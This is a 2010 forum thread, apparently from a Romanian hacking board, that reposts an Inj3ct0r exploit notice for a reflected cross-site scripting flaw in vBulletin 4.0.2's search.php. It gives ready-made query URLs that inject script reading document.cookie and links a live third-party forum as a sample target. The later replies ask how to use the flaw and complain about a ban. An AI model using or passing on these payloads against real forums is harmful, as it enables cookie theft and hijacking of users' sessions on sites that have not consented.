begood Posted March 24, 2010 Report Posted March 24, 2010 =================================Vbulletin 4.0.2 XSS Vulnerability=================================[+] Vbulletin 4.0.2 XSS Vulnerability1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00 _ __ __ __ 11 /' \ __ /'__`\ /\ \__ /'__`\ 00 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 11 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 00 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 11 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 00 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 11 \ \____/ >> Exploit database separated by exploit 00 \/___/ type (local, remote, DoS, etc.) 11 10 [+] Site : Inj3ct0r.com 01 [+] Support e-mail : submit[at]inj3ct0r.com 10 01 ###################################### 10 I'm 5ubzer0 member from Inj3ct0r Team 11 ###################################### 00-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1[+] Discovered By: 5ubzer0[+] My id : http://inj3ct0r.com/author/2307[+] Original : http://inj3ct0r.com/exploits/9697# Version: Vbulletin 4.0.2www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>Exemple:[url=http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]Pesquisar nos Fóruns - Fórum Jogos Online[/url]# Inj3ct0r.com [2010-03-19] Quote
necse6alex Posted March 24, 2010 Report Posted March 24, 2010 (edited) Poti sa dai exemplu cum sa foloseste ..?@pax caut salam barbos ... bun mai eeeeee...*banned* Edited March 24, 2010 by begood Quote
necsemaster Posted March 26, 2010 Report Posted March 26, 2010 (edited) Doamne ce am facut rau mia dat ban ... poate un admin sa imi scoata si mie banu ..ms mult . daca am facut ceva rau puteai sa imi zici.edit:scz pt intrebare stupid dar mam informat si stiu ce inseamna xss .. si terog scoatem banu:( Edited March 27, 2010 by necsemaster Quote